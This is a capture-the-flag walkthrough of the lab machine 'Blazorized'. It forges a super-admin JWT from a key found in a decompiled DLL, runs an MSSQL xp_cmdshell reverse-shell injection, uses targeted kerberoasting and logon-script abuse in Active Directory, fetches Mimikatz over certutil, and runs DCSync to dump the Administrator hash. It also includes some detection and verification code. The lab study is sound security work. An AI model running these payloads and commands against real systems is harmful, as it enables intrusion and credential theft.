TL;DR
This is a Windows Server 2019 machine hosting a web site made with Blazor, an ASP.NET framework for building WebAssembly-based sites. Enumerating the application, we are able to retrieve vulnerable binary files and, after reversing them, find out how to create super admin JWT tokens. Once inside the admin dashboard we use MSSQL injection to gain our first low-priv shell. For escalation, we discover several permissive ACEs with BloodHound and abuse them with PowerView to move laterally between domain users. Finally we land in a user account holding DCSync permissions, and we use it to root the domain.
KEYWORDS
Blazor, .NET, reversing, dnSpy, Unix time, JWT forging, MSSQL injection, Active Directory, Bloodhound enumeration, PowerView, WriteSPN, targeted kerberoasting, ACL enumeration, script path abuse, DCSync attack, Invoke-Mimikatz.
REFERENCES
https://support.bloodhoundenterprise.io/hc/en-us/articles/17222775975195-WriteSPN
https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#genericwrite-on-user
ENUMERATION
Port scan.
> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-10 14:50 EDT
Nmap scan report for 10.10.11.22
Host is up, received user-set (0.060s latency).
Not shown: 43083 filtered tcp ports (no-response), 22440 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
3268/tcp open globalcatLDAP syn-ack
5985/tcp open wsman syn-ack
49664/tcp open unknown syn-ack
49673/tcp open unknown syn-ack
49692/tcp open unknown syn-ack
49776/tcp open unknown syn-ack
Nmap done: 1 IP address (1 host up) scanned in 54.88 seconds
Enumerate the open ports.
> nmap $target -p53,80,135,139,445,464,3268,5985 -sV -sC -Pn -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-10 14:53 EDT
Nmap scan report for 10.10.11.22
Host is up, received user-set (0.038s latency).
Scanned at 2024-10-10 14:53:03 EDT for 19s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 49214/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 33356/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 39093/udp): CLEAN (Failed to receive data)
|   Check 4 (port 35591/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-10-10T18:53:46
|_  start_date: N/A
|_clock-skew: 29s
Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds
Add blazorized.htb to the hosts file and enumerate the site with Firefox.
Fuzz for subdomains.
> ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fc 404,302 -t 100 -u http://blazorized.htb -H "Host: FUZZ.blazorized.htb"
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://blazorized.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.blazorized.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404,302
________________________________________________
admin [Status: 200, Size: 2042, Words: 149, Lines: 28, Duration: 74ms]
:: Progress: [4989/4989] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:08] :: Errors: 0 ::
Add the subdomain to the hosts file and enumerate with Firefox.
There is also a "Check for updates" section. If we click it and inspect the traffic with Burp Suite, we capture a JWT token.
Decode the token to get an idea of how they are formed. We discover that they are signed using the HS512 symmetric algorithm and that they also disclose the super admin username.
USER
Let's continue inspecting the traffic with Burp Suite. There is a request for a blazor.boot.json file that contains information about the application.
It can also be downloaded with Firefox, right click on the tab, click on "Inspect code" and add the path to the JSON file.
In the JSON there is a reference to a DLL called blazorized.helpers.dll. Download it (just enter the URL http://blazorized.htb/_framework/blazorized.helpers.dll) and decompile it with dnSpy. Here we see several things.
First, JWT tokens are signed with a symmetric key (HS512 algorithm), as we had seen before.
A bit further in the code we see the HS512 key hardcoded in the source code, along with other claims and a new subdomain, http://api.blazorized.htb.
And we find out how the tokens are generated.
The application is using Unix time to calculate token expiration times.
All in all, we have all we need to forge our own super admin ticket. To calculate Unix time I made a short Python script.
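import datetime

# Expiration time: 600 seconds from now, taken as an aware UTC datetime so that
# timestamp() does not reinterpret a naive value in the local time zone.
date = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(seconds=600)
unix_time = int(date.timestamp())
print(unix_time)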
And used it to calculate expiration time (600 seconds from current time).
Entered this data in https://jwt.io , along with the wanted role and super admin email, so we calculate our forged token.
To use this token we load it in a Firefox tab using the console (F12). First we declare the token variable.
let token = 'eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJleHAiOjE3Mjg2NzAyODcsImlzcyI6Imh0dHA6Ly9hcGkuYmxhem9yaXplZC5odGIiLCJhdWQiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIn0.948SOVXlaqFPcCLwtwYD7ifsRfwyHHAmVUoqGLcPsr6PMCilxzNZZrpL-GjMkBlE3jRqipGWZtgYyra1_dtT-Q';
And store it in the browser's local storage under the key jwt.
localStorage.setItem('jwt', token);
Reload http://admin.blazorized.htb and you are logged in as super admin.
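The HS512 scheme described above, as an added example that is not part of the original write-up or the application's code: it signs and verifies a token with Python's standard library to show that every server-side check passes for any holder of the shared key. The key is a constructed sample; the claim URI, role, issuer and audience values mirror the token shown on this page.

```python
import base64, hashlib, hmac, json, time

# Claim URI, role value, issuer and audience mirror the token shown on this page.
ROLE = "http://schemas.microsoft.com/ws/2008/06/identity/claims/role"
ISSUER = AUDIENCE = "http://api.blazorized.htb"
KEY = b"constructed-sample-key"  # constructed; stands in for the key found in the DLL

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def unb64url(seg):
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def mac(head, body, key):
    return hmac.new(key, f"{head}.{body}".encode(), hashlib.sha512).digest()

def sign_hs512(claims, key):
    """Mint a token: HMAC-SHA512 over 'header.payload' with the shared key."""
    head = b64url(json.dumps({"alg": "HS512", "typ": "JWT"}).encode())
    body = b64url(json.dumps(claims).encode())
    return f"{head}.{body}.{b64url(mac(head, body, key))}"

def verify_hs512(token, key, now=None):
    """Checks a server can make: pinned alg, signature, exp, iss, aud."""
    try:
        head, body, sig = token.split(".")
        header, claims = json.loads(unb64url(head)), json.loads(unb64url(body))
        got = unb64url(sig)
        if not (isinstance(header, dict) and isinstance(claims, dict)):
            raise ValueError
    except ValueError as exc:  # bad segment count, base64 or JSON
        raise ValueError("malformed token") from exc
    if header.get("alg") != "HS512":
        raise ValueError("unexpected algorithm")
    if not hmac.compare_digest(mac(head, body, key), got):
        raise ValueError("bad signature")
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or exp <= (time.time() if now is None else now):
        raise ValueError("token expired")
    if claims.get("iss") != ISSUER or claims.get("aud") != AUDIENCE:
        raise ValueError("wrong issuer or audience")
    return claims

if __name__ == "__main__":
    claims = {ROLE: "Super_Admin", "exp": int(time.time()) + 600, "iss": ISSUER, "aud": AUDIENCE}
    # Every check passes for whoever holds KEY, which is why it must stay server-side.
    print(verify_hs512(sign_hs512(claims, KEY), KEY)[ROLE])
```

Signature, expiry, issuer and audience checks cannot tell a legitimate issuer from anyone else who holds the key, so the signing key has to live only on the server, or tokens have to be signed with an asymmetric key whose public half is the only part distributed.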
They say the application talks to the database directly, so we can try an MSSQL injection. The point of entry is the "Check duplicate category names".
For the payload, I used a powershell -e base64-encoded payload.
'; exec master.dbo.xp_cmdshell 'powershell -e <base64-encoded payload>' -- -
This provides a reverse shell for user nu_1055 that can be used to retrieve the user flag.
SYSTEM
Start from the low-priv shell and take the opportunity to enumerate the user and the system.
> systeminfo
Host Name: DC1
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PC
> net user
User accounts for \\DC1
-------------------------------------------------------------------------------
Administrator Guest krbtgt
LSA_3211 LSA_3212 LSA_3213
NU_1055 NU_1056 NU_1057
NU_1058 RSA_4810 RSA_4811
RSA_4812 RSA_4813 RSA_4814
SSA_6010 SSA_6011 SSA_6012
SSA_6013
The command completed successfully.
> net user nu_1055
User name NU_1055
Full Name NU_1055
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/25/2024 12:55:07 PM
Password expires Never
Password changeable 2/26/2024 12:55:07 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile C:\Users\NU_1055
Home directory C:\Users\NU_1055
Last logon 10/11/2024 9:37:11 AM
Logon hours allowed All
Local Group Memberships *IIS_IUSRS *Remote Management Use
Global Group memberships *Normal_Users *Domain Users
The command completed successfully.
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Transfer a sharphound.exe ingestor to the host and enumerate the domain with BloodHound. Use the list of usernames we have just enumerated and the BloodHound pathfinding tool.
There is an interesting edge from nu_1055 to rsa_4810. There is info about WriteSPN edges here: https://support.bloodhoundenterprise.io/hc/en-us/articles/17222775975195-WriteSPN
Basically, we have permission to add an SPN to the rsa_4810 account, thus making it vulnerable to targeted kerberoasting (https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting).
Let's modify the account's SPN with powerview.ps1
> . .\powerview.ps1
> Set-DomainObject -Identity RSA_4810 -Set @{serviceprincipalname='hey/hey'}
Now request a Kerberos ticket for the SPN we have just created.
> Get-DomainSPNTicket -SPN hey/hey
This ticket can be cracked (module 13100), and the password is valid to Evil-WinRM into the host as user rsa_4810.
> evil-winrm -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)' -i blazorized.htb
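From the defender's side, the SPN write followed by a ticket request leaves a correlatable trail. The following added example (not part of the original write-up) pairs Security event 5136 (directory object modified) with event 4769 (service ticket requested); the sample events are constructed, WEB01 is a hypothetical host, and the 30-minute window is an assumption.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)  # assumed correlation window
VALUE_ADDED = "%%14674"         # OperationType code for "Value Added" in event 5136
RC4 = "0x17"                    # RC4-HMAC ticket encryption type

def ev(eid, ts, **fields):
    return {"id": eid, "time": datetime.fromisoformat(ts), **fields}

# Constructed sample events; field names follow Security events 5136 and 4769.
EVENTS = [
    ev(5136, "2024-10-11T09:40:02", SubjectUserName="NU_1055", ObjectClass="user",
       ObjectDN="CN=RSA_4810,CN=Users,DC=blazorized,DC=htb",
       AttributeLDAPDisplayName="servicePrincipalName", AttributeValue="hey/hey",
       OperationType=VALUE_ADDED),
    ev(4769, "2024-10-11T09:40:09", TargetUserName="NU_1055@BLAZORIZED.HTB",
       ServiceName="RSA_4810", TicketEncryptionType=RC4),
    ev(5136, "2024-10-11T10:02:00", SubjectUserName="DC1$", ObjectClass="computer",
       ObjectDN="CN=WEB01,CN=Computers,DC=blazorized,DC=htb",
       AttributeLDAPDisplayName="servicePrincipalName", AttributeValue="HTTP/web01",
       OperationType=VALUE_ADDED),
    ev(4769, "2024-10-11T10:05:00", TargetUserName="NU_1056@BLAZORIZED.HTB",
       ServiceName="DC1$", TicketEncryptionType="0x12"),
]

def account_from_dn(dn):
    """First RDN value; assumes the CN matches the sAMAccountName, as on this page."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def detect_targeted_kerberoast(events):
    """Flag SPNs added to user objects by another account, plus follow-up ticket requests."""
    findings = []
    for w in events:
        if not (w["id"] == 5136 and w["ObjectClass"] == "user"
                and w["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
                and w["OperationType"] == VALUE_ADDED):
            continue
        target = account_from_dn(w["ObjectDN"])
        if w["SubjectUserName"].lower() == target.lower():
            continue  # account editing its own SPN is out of scope here
        tickets = [t for t in events if t["id"] == 4769
                   and t["ServiceName"].lower() == target.lower()
                   and timedelta(0) <= t["time"] - w["time"] <= WINDOW]
        findings.append({
            "target": target, "changed_by": w["SubjectUserName"],
            "spn": w["AttributeValue"], "ticket_requests": len(tickets),
            "rc4_requested": any(t["TicketEncryptionType"] == RC4 for t in tickets),
            "severity": "high" if tickets else "medium",
        })
    return findings
```

Event 5136 is only written when directory service change auditing is enabled and the object's SACL covers the write, so the absence of findings on an unaudited domain means nothing.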
Now we can mark rsa_4810 as "Owned" in BloodHound and continue enumerating. It seems both rsa_4810 and nu_1055 are members of the Remote Management Users group, along with another one called ssa_6010.
If we continue enumerating this user we see he is one of the principals with DCSync rights, meaning he is the candidate for our next lateral movement.
Enumerate the user's ACL from the rsa_4810 shell using PowerView's Get-ObjectAcl cmdlet.
> Get-ObjectAcl -SamAccountName ssa_6010 -ResolveGUIDs | ? { $_.ActiveDirectoryRights -eq "WriteProperty" }
AceQualifier : AccessAllowed
ObjectDN : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
ActiveDirectoryRights : WriteProperty
ObjectAceType : Script-Path
ObjectSID : S-1-5-21-2039403211-964143010-2924010611-1124
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2039403211-964143010-2924010611-1107
AccessMask : 32
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=SSA_6010,CN=Users,DC=blazorized,DC=htb
ActiveDirectoryRights : WriteProperty
ObjectAceType : ms-TPM-Tpm-Information-For-Computer
ObjectSID : S-1-5-21-2039403211-964143010-2924010611-1124
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-10
AccessMask : 32
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0
We see the current user has write permissions over the ssa_6010 script path, meaning we can add scripts that will be automatically executed when the user logs in.
> Convert-SidToName S-1-5-21-2039403211-964143010-2924010611-1107
BLAZORIZED\RSA_4810
Info about how to exploit this is provided here: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse#genericwrite-on-user
First add a reverse shell in the file shell.bat and save it in the SYSVOL folder.
> 'powershell -e <base64-encoded payload>' | Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\shell.bat -Encoding ASCII
Now modify the script path for user ssa_6010.
> Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\shell.bat'
Shortly after the user logs in again, the script is executed and a shell is received on port 1919.
From here we can launch a DCSync attack.
We do not know the clear text password or hash of user ssa_6010, so we cannot do it remotely with Impacket. Instead we will use a Mimikatz copy stored locally. Download a copy of invoke-mimikatz.ps1 with certutil and dot source the script.
> certutil -urlcache -split -f http://10.10.14.101/invoke-mimikatz.ps1
> . .\invoke-mimikatz.ps1
Issue the DCSync attack; the administrator hash is dumped.
> invoke-mimikatz -command '"token::elevate" "lsadump::dcsync /domain:blazorized.htb /user:Administrator"'
  .#####.   mimikatz 2.2.0 (x64) #19041 Jul 24 2021 11:00:11
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
mimikatz(powershell) # lsadump::dcsync /domain:blazorized.htb /user:Administrator
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/25/2024 12:54:43 PM
Object Security ID : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID : 500
Credentials:
Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
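A detection for the DCSync step above, added here as an example and not taken from the original write-up: it scans Security event 4662 records for the directory replication extended rights requested by an account that is not a domain controller. The sample events are constructed, and the allow-list assumes DC1 is the only domain controller, as the scan output on this page suggests.

```python
import re

# Control access right GUIDs for directory replication.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GET_ALL = "DS-Replication-Get-Changes-All"  # the right that exposes password data
DOMAIN_CONTROLLERS = {"DC1$"}               # assumed: machine accounts allowed to replicate
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")
DOMAIN_DNS = "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"  # object type of the domain head

# Constructed sample 4662 events; only the fields the check needs are included.
EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC1$",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} " + DOMAIN_DNS},
    {"EventID": 4662, "SubjectUserName": "SSA_6010",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} " + DOMAIN_DNS},
    {"EventID": 4662, "SubjectUserName": "SSA_6010",
     "Properties": "%%7688 {1131F6AD-9C07-11D1-F79F-00C04FC2DCD2} " + DOMAIN_DNS},
    {"EventID": 4662, "SubjectUserName": "NU_1055",
     "Properties": "%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

def detect_dcsync(events, allowed=DOMAIN_CONTROLLERS):
    """Return accounts outside the allow-list that exercised replication rights."""
    seen = {}
    for e in events:
        if e.get("EventID") != 4662 or e["SubjectUserName"].upper() in allowed:
            continue
        for guid in GUID_RE.findall(e.get("Properties", "")):
            right = REPL_RIGHTS.get(guid.lower())
            if right:
                seen.setdefault(e["SubjectUserName"], set()).add(right)
    return [{"account": acct, "rights": sorted(rights), "can_read_secrets": GET_ALL in rights}
            for acct, rights in sorted(seen.items())]

if __name__ == "__main__":
    for alert in detect_dcsync(EVENTS):
        print(alert)
```

Event 4662 is only logged when directory service access auditing is enabled and the domain object carries a matching SACL; the same GUIDs can be used to audit which principals hold these rights in the first place.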
The only thing that's left is to open an administrator shell with Impacket.
You are root.